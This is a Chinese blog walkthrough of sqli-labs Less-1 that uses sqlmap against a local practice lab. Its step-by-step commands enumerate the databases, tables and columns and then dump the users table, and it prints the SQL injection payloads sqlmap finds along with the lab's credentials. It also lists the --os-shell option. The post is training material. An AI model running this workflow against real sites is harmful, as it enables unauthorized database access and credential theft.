Less-1(sqlmap自动注入攻击)--sqli

最新推荐文章于 2024-05-20 08:46:05 发布
最新推荐文章于 2024-05-20 08:46:05 发布
阅读量543 收藏 2
点赞数 7
分类专栏: web安全 SQL注入 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/XiaoYeZhu_1314/article/details/135892930
版权

环境准备

打开火狐浏览器,进入sqli第一关的页面

工具准备

  sqlmap

参数解释

-u URL

指定目标URL进行注入测试。
--data=DATA指定POST请求的数据进行注入测试
--cookie=COOKIE指定用于身份验证的cookie进行注入测试
-p PARAMETER指定要测试的参数
--level=LEVEL设置测试的深度级别(1-5)
--risk=RISK设置测试的风险级别(1-3)
--dbs获取数据库管理系统的信息
--tables获取数据库中表的信息
--dump获取数据库表中的数据
--os-shell尝试获取操作系统级别的shell访问权限

具体步骤

1.在搜索栏中输入“?id=1”,回车(一定要使用英文输入)

查看结果发现,可以访问到名字和密码

在搜索栏中输入“?id=2”,回车

?id=3,回车

2.打开命令行“cmd”,使用sqlmap进行自动注入攻击
第一步:在cmd下
python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-1/?id=1"        
 //使用sqlmap对此url网页进行自动注入扫描,找注入点

遇见[y/n]都直接回车跳过,得到

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 2363=2363 AND 'waaH'='waaH

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: id=1' AND GTID_SUBSET(CONCAT(0x71706b7071,(SELECT (ELT(2276=2276,1))),0x717a6b6a71),2276) AND 'AJPH'='AJPH

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 9037 FROM (SELECT(SLEEP(5)))yKXS) AND 'prBO'='prBO

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-1860' UNION ALL SELECT NULL,NULL,CONCAT(0x71706b7071,0x557348446b50717065444f776f784179496e744d587a674f496b794d72454c45666e504d796e6456,0x717a6b6a71)-- -
---

表明有四种注入漏洞:boolean-based blind,error-based,time-based blind,UNION query

第二步:爆库名
python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-1/?id=1" --dbs

available databases [9]:
[*] challenges
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] pikachu
[*] pkxss
[*] security
[*] test
第三步:爆表名
python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-1/?id=1" -D security --tables

Database: security
[4 tables]
+----------+
| emails   |
| referers |
| uagents  |
| users    |
+----------+
第四步:爆字段名
python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-1/?id=1" -D security -T users --columns

Database: security
Table: users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(3)      |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+
第五步:爆数据
python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-1/?id=1" -D security -T users -C id,username,password --dump

Database: security
Table: users
[13 entries]
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
| 1  | Dumb     | Dumb       |
| 2  | Angelina | I-kill-you |
| 3  | Dummy    | p@ssword   |
| 4  | secure   | crappy     |
| 5  | stupid   | stupidity  |
| 6  | superman | genious    |
| 7  | batman   | mob!le     |
| 8  | admin    | admin      |
| 9  | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
+----+----------+------------+

完成,就得到了账户和密码

小野猪都有白菜拱
关注
  • 7
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqlmap-1.6.5-11_sqlmap-1.6.5-11
09-20
sqlmap-1.6.5-11 sql注入工具
sqlmap中文手册-sql注入自动化测试工具
07-19
sql注入自动化测试工具sqlmap的操作手册,中文版,值得拥有哦。Web安全测试必备工具。
sqlmap-1.4.5.zip
05-22
sqlmap-1.4.5,亲爱的朋友,SQLMAP自动化的SQL注入和数据库接管工具,是开源的渗透测试工具,它能自动检测和利用SQL注入漏洞并接管数据库服务器。它配备了强大的检测引擎、最终渗透测试器的许多利基特性和广泛的开关,从数据库指纹、从数据库获取数据到通过带外连接访问底层文件系统和在操作系统上执行命令。这是本人从sqlmap上下载来的最新版本sqlmap,没有作任何修该
利用SQLmap实现 SQL 注入
LAL07019的博客
06-28 1310
所谓SQL注入攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。数据库都是Web应用环境中非常重要的环节。SQL命令就是前端Web和后端数据库之间的接口,使得数据可以传递到Web应用程序,也可以从其中发送出来。需要对这些数据进行控制,保证用户只能得到授权给他的信息。
利用Sqlmap进行SQL注入攻击
m0_62689523的博客
08-14 1699
sqlmap简介 sqlmap是一款基于python编写的渗透测试工具,在sql检测和利用方面功能强大,支持多种数据库。 功能:sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞。.........
sqli_labs:Less-1 简要SQL注入-基于错误的单引号字符串
qq_43660551的博客
08-13 528
一、判断是否存在注入注入是字符型还是数字型。 ?id=1,正常 ?id=1' ,加上“ ' ”后,报错,所以可能存在字符型输入。 ?id=1%27--+ ,用--+注释掉以后,正常。 所以存在单引号字符型注入。 ...
SQL注入less-1
m0_62903168的博客
05-03 796
注:phpstudy默认的php版本为7.x,想要成功的搭建靶场,需要把php版本改为5.x。
sqli-labs中less-1~4实验详解
mr_secretT的博客
05-26 501
该语句的意思是查询information_schema数据库下的tables表里面且table_schema字段内容是security的所有table_name的数据。这里我们使用的id参数为0,是因为我们需要id参数不存在于数据库的序列号当中,也可以使用负数.通过上述回显,我们可以判定,回显位为第2\3列。4.根据结果我们可以判定这是一个字符型注入漏洞,我们可以得到页面回显。2.从页面回显可以看出,3列数据中,只有2列可以页面回显,我们需要确认一下到底是哪两列会回显呢?我们可以构造语句获取每个。
Sqli-labs靶场笔记1(Less-1 SQL注入基本操作)
m0_52233414的博客
03-31 392
sqli-labs靶场使用的是mysql数据库,所以在打之前,我们要了解一下mysql数据库的结构,mysql数据库5.0以上版本有一个自带的数据库叫做information_schema,该数据库下面有两个表一个是tables和columns。tables这个表的table_name字段下面是所有数据库存在的表名。table_schema字段下是所有表名对应的数据库名。columns这个表的colum_name字段下是所有数据库存在的字段名。columns_schema字段下是所有表名对应的数据库。
SQL注入闯关第一关-Less1
qq_54037445的博客
10-06 1845
SQL注入闯关
第十节 Sqlmap注入参数1-01
09-15
第十节 Sqlmap注入参数1-01
Jingubang:金箍棒-基于SQLMAPAPI的分布式注入系统
03-11
金箍棒-基于SQLMAPAPI的分布式注入系统 数据库配置文件调试模式已打开,开发结束后切记关闭$ config ['encryption_key']在config / config.php里设置api地址在sql_model里设置请在config / database.php里完成数据库...
SQL注入SQLMap
qq_53218512的博客
07-24 869
Sqlmap是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。目前支持的数据库有MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access等大多数据库。
sql注入sqlmap全详细
qq_41620273的博客
12-25 3310
sql注入sqlmap SQL注入危害: SQL注入分类: 1.基于注入点分类:get注入、post注入、cookie注入 2.基于变量数据类型: 字符型、数字型注入 3.基于获取数据类型方法: 基于回显(查询结果直接显现)、基于错误(由于配置的原因,包错日志原本因该打印到日志文件夹中,却直接输出到了网页页面上来了)、盲注(布尔盲注、时间盲注) 数字型: 布尔盲注: 在id=1后拼接 and 1=1或者 and 1=2; 判断是true或者false 时间盲注:在id=1后拼接
sqli-labs sqlmap注入(包含sqlmap、burpsuite下载)
qq_51930350的博客
06-14 365
python sqlmap.py -u http://ip地址/sqli-labs/Less-2/?python sqlmap.py -u http://ip地址/sqli-labs/Less-2/?python sqlmap.py -u http://ip地址/sqli-labs/Less-2/?python sqlmap.py -u http://ip地址/sqli-labs/Less-2/?python sqlmap.py -u http://ip地址/sqli-labs/Less-2/?
[BUUCTF]-N1BOOK-[第一章 web入门]SQL注入-1 及sqlmap的简单使用
yzl_007的博客
08-28 1381
[第一章 web入门]SQL注入-1 及sqlmap的简单使用 跟着题目来学习一下sqlmap的简单使用 首先?id=1是如下结果 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ked8spa3-1630160772569)(https://i.loli.net/2021/08/28/Oemn9syKg1lEcxS.png)] id=1’ [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HsULWnzZ-1630160772571)(https
Less-1(sqlmap手工注入攻击)--sqli
XiaoYeZhu_1314的博客
03-20 548
在这个表里面我们获得了列名: user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password,level,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password,level,id,username,password,id,username,password。1' and '1'='1 --+ 正确结果。
网络安全之sql注入-less1
koala_king的博客
08-17 1345
less-1 是字符注入,union注入的步骤一般有以下几步: 1、判断注入点 2、判断是整型还是字符型 3、判断查询列数 4、判断显示位 5、获取敏感信息 1、判断注入点 我们再Less1中看到,id将作为参数来使用,因此我们输入: http://localhost/Less-1/?id=1 这是看到访问了第一个用户的用户名和密码: 此时加入单引号进行尝试,这里是在id后面加了一个单引号,这里发现了语句的错误。 You have an error in your SQL syntax; check t
Docker笔记-搭建达梦Python环境(dmPython + SQLAlchemy)
最新发布
IT1995的博客
05-20 275
达梦提供的C接口,dpi和java的jar包已经很好用了,想不到,来了一个用python的同事,这里就只能适应下他了,在不影响其他环境下搭建一个python的达梦环境。最后发现,python对进行达梦增删改查,还是比较简单的开发效率大于C的dpi,甚至感觉效率也不再java之下。仅仅是搞业务这块还是比较方便的,但搭建和部署,难度比C和Java复杂了很多,反正就是各有优劣吧。
sqli-labs sqlmap
10-02
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --dbs -D mysql --tables 3. 获取字段: python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --dbs -D mysql -T user --columns 4. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小野猪都有白菜拱

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值